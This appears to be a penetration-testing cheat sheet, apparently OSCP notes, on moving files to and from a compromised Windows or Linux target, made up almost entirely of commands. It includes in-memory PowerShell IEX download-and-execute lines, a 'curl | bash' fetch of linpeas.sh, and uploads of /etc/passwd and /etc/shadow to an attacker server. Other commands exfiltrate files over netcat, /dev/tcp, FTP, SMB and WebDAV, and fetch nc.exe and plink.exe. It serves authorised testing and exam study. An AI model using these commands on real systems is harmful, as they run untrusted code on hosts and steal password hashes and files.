For more detailed methods: https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/
Use my transfile.sh script from here
Download a file to disk:
{% code overflow="wrap" %}
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')
{% endcode %}
Download and execute in memory without saving to disk:
{% code overflow="wrap" %}
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')
{% endcode %}
To base64-encode a file using PowerShell:
{% code title="Decode in linux with base64 -d" overflow="wrap" %}
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
{% endcode %}
To upload using PowerShell:
{% code overflow="wrap" %}
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
{% endcode %}
{% code title="Use python -m uploadserver on target" %}
Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hosts
{% endcode %}
certutil -urlcache -f ${file url} filename
powershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exe
Attacker (start an upload server):
updog -p 80
OR
python3 -m uploadserver
Target:
Download the helper script, then upload:
{% code title="Use PSUpload.ps1" overflow="wrap" %}
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Path\to\file
{% endcode %}
Upload from Linux with curl:
{% code overflow="wrap" %}
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
{% endcode %}
To base64-encode the file and POST it instead:
{% code overflow="wrap" %}
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\to\file' -Encoding Byte))
Invoke-WebRequest -Uri http://<ip>:8000/ -Method POST -Body $b64
{% endcode %}
sudo systemctl start apache2
sudo cp /path/to/file.exe /var/www/html/
{% code title="download from apache server on powershell" %}
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
{% endcode %}
Attacker:
impacket-smbserver NAME $(pwd) -smb2support -user aditya -password aditya
Target (PowerShell):
{% code title="Copy files" %}
copy \\192.168.220.133\share\nc.exe
{% endcode %}
{% code title="Authenticated mount" %}
net use n: \\10.10.14.24\share /user:test test
{% endcode %}
Or, with explicit credentials:
{% code overflow="wrap" %}
$pass = convertto-securestring 'aditya' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential{'aditya',$pass}
New-PSDrive -Name aditya -PSProvide FileSystem -Credential $cred -Root \\10.10.14.24\aditya
cd aditya:
{% endcode %}
- Attacker: to host the FTP server
python -m pyftpdlib 21
- Target:
ftp ${IP}
Attacker (writable FTP server for uploads):
sudo python3 -m pyftpdlib --port 21 --write
Target:
{% code title="Powershell" %}
(New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Path\to\File')
{% endcode %}
{% code title="CMD" %}
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
{% endcode %}
Attacker:
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Target:
{% code title="The DavWWWRoot is required in windows" %}
dir \\192.168.49.128\DavWWWRoot
{% endcode %}
{% code title="To upload" %}
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
{% endcode %}
curl 10.10.14.22/linpeas.sh | bash
#Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80
#HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
#Print the Response
cat <&3
To send a file with netcat:
nc -nv 192.168.49.249 80 < /etc/passwd
To receive it on the listener side:
nc -nlvp 80
Using netcat to send files:
Target (receiver):
nc -l -p 1234 -q 1 > something.zip < /dev/null
Attacker (sender):
cat something.zip | netcat <ip> 1234
If credentials are available, use scp:
scp linenum.sh user@remotehost:/remote/path/
{% hint style="info" %} Use the md5sum command to verify the transferred file's hash and the file command to check its type {% endhint %}
To get base64 output of the file:
base64 file -w 0
Decode on the other side:
{% code title="Use the file command to validate the result" %}
echo "base64 string" | base64 -d > file
{% endcode %}
{% code title="To verify: Get-FileHash C:\Users\Public\filename -Algorithm md5" overflow="wrap" %}
[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("base64string"))
{% endcode %}